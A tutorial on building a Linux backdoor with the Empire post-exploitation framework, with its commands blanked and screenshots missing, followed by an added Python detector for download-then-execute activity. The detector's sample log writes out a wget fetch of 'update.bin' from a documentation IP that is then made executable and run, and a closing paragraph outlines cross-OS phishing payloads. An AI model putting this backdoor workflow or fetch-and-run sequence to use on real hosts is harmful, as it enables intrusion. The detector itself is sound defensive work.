White Hat Institute

Creating Linux backdoor with the Empire tool

Empire is a post-exploitation framework. Its agent is pure PowerShell, while the framework itself is written in Python, and it is built on cryptographically secure communications and a flexible architecture. Empire can run PowerShell agents without needing PowerShell.exe.

PowerShell offers many offensive advantages, including full access to .NET, ways around application whitelisting (AppLocker), and direct access to the Win32 API. It can also assemble malicious binaries in memory. Empire provides C2 functionality and lets you deliver a second-stage payload once the first stage has run. It can also be used for lateral movement.

Navigate to the  directory and run the tool using the  command, then list all available stagers with the  command. To target Linux operating systems, select the  stager by using the  command. Use the  command to list all the settings you can edit.

[Screenshot: Linux backdoor, Empire]

Next, we need to set the  to the listener we created before and the  path where the backdoor will be saved. In this example, we set the listener to  and the output file to the  directory, naming it .

[Screenshot: Linux backdoor 2]

Now let’s go to our target computer and download the backdoor from the attacker’s web server.

[Screenshot: Linux backdoor 3]

Generally, people who use a Linux operating system run executable programs from the terminal. So open up the terminal, navigate to the  directory, and run the backdoor using the  command.

[Screenshot: Linux backdoor 4]

Once the victim runs the backdoor, the attacker's computer receives an active agent and can interact with it to continue post-exploitation, as shown in the screenshot below.

[Screenshot: Linux backdoor 5]
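The chain shown above (a file is fetched from a web server into a directory the user can write to, made executable, and launched from the terminal a few seconds later) is also exactly what a defender can look for on a Linux host. The following detector is an added example and is not part of the original post or of the Empire project: it reads a constructed process-event log (one execve per line in a simplified `ts uid= pid= exe= argv=` format that I made up for this example; real auditd or eBPF output would need its own parser) and raises a high-severity alert when a binary is run from a user-writable directory within ten minutes of the same file name being downloaded by curl or wget, and a medium-severity alert for any other execution from such a directory. The host, file and user names in the sample log are constructed.

```python
import re
from datetime import datetime, timedelta
from pathlib import PurePosixPath
from urllib.parse import urlparse

# Constructed sample process-event log (not real auditd output): one execve per line.
# The download-then-run sequence for update.bin mirrors the walkthrough above.
SAMPLE_EVENTS = """\
2024-03-01T10:00:01 uid=1000 pid=4101 exe=/usr/bin/wget argv=wget http://203.0.113.10/update.bin -O /home/alice/Downloads/update.bin
2024-03-01T10:00:09 uid=1000 pid=4105 exe=/usr/bin/chmod argv=chmod +x /home/alice/Downloads/update.bin
2024-03-01T10:00:12 uid=1000 pid=4106 exe=/home/alice/Downloads/update.bin argv=./update.bin
2024-03-01T10:05:00 uid=1000 pid=4110 exe=/usr/bin/ls argv=ls -la
2024-03-01T11:00:00 uid=1000 pid=4200 exe=/usr/bin/curl argv=curl -sSL https://example.org/tool.tar.gz -o /tmp/tool.tar.gz
2024-03-01T12:30:00 uid=1000 pid=4300 exe=/tmp/tool argv=/tmp/tool
"""

# Directories an unprivileged user can normally write to (assumed list; tune per host).
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
DOWNLOADERS = {"curl", "wget"}
WINDOW = timedelta(minutes=10)  # how soon after a download an execution counts as correlated

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) uid=(?P<uid>\d+) pid=(?P<pid>\d+) exe=(?P<exe>\S+) argv=(?P<argv>.*)$"
)


def parse_events(text):
    """Parse the constructed log format; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        ev["argv"] = ev["argv"].split()
        events.append(ev)
    return events


def downloaded_name(tool, argv):
    """Return the local file name a curl/wget command line will create, or None."""
    out = url = None
    for i, tok in enumerate(argv[1:], start=1):
        if tok.startswith(("http://", "https://")):
            url = tok
        elif tool == "wget" and tok in ("-O", "--output-document") and i + 1 < len(argv):
            out = argv[i + 1]
        elif tool == "curl" and tok in ("-o", "--output") and i + 1 < len(argv):
            out = argv[i + 1]
    if out is not None:
        return PurePosixPath(out).name
    if url is not None:  # curl -O / plain wget keep the URL's base name
        return PurePosixPath(urlparse(url).path).name or None
    return None


def find_suspicious_executions(log_text):
    """Correlate downloads with later executions from user-writable paths."""
    recent_downloads = {}  # file name -> time of the most recent fetch
    alerts = []
    for ev in sorted(parse_events(log_text), key=lambda e: e["ts"]):
        exe = ev["exe"]
        name = PurePosixPath(exe).name
        if name in DOWNLOADERS:
            fetched = downloaded_name(name, ev["argv"])
            if fetched:
                recent_downloads[fetched] = ev["ts"]
            continue
        if not exe.startswith(USER_WRITABLE_PREFIXES):
            continue  # system binaries are out of scope for this rule
        fetched_at = recent_downloads.get(name)
        if fetched_at is not None and ev["ts"] - fetched_at <= WINDOW:
            delay = int((ev["ts"] - fetched_at).total_seconds())
            alerts.append({"pid": ev["pid"], "uid": ev["uid"], "exe": exe, "severity": "high",
                           "reason": "executed %d s after being downloaded" % delay})
        else:
            alerts.append({"pid": ev["pid"], "uid": ev["uid"], "exe": exe, "severity": "medium",
                           "reason": "executed from a user-writable directory"})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_executions(SAMPLE_EVENTS):
        print("[%s] pid=%s uid=%s %s: %s" % (alert["severity"].upper(), alert["pid"],
                                             alert["uid"], alert["exe"], alert["reason"]))
```

On the sample log this yields one high alert for `update.bin` (run 11 seconds after the wget) and one medium alert for `/tmp/tool`, whose name does not match the earlier `tool.tar.gz` download. The rule is deliberately narrow; in practice you would also treat `chmod +x` on a freshly downloaded file and outbound connections from the new process as corroborating signals, and feed real audit records rather than this constructed format.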

We come across organizations of all sizes, shapes, and compositions in our research. One pattern we have seen many times is a roughly even mix of Windows and Apple OS X machines. Under normal circumstances it can be difficult to tell which users are on Windows and which are on OS X, which makes phishing with malware harder: if a payload built for one operating system lands on the other, no shell comes back.

As a workaround, we can add logic to the payload that decides whether to run a PowerShell or a Python stage depending on the target operating system. Ready-made stagers for this now exist, thanks to the merger of the PowerShell Empire and EmPyre projects into PowerShell Empire 2.0.